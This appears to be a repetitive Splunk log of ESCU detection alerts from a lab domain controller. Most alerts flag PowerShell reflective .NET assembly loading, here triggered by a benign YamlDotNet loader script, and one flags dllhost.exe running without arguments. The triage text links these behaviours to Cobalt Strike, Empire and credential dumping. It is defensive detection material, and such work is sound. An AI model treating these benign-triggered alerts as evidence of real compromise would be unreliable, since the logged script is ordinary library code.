\"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664942132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664942132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664942132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664935200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664935200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2256", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664938532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664938532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664938532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T01:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T01:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664938532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", 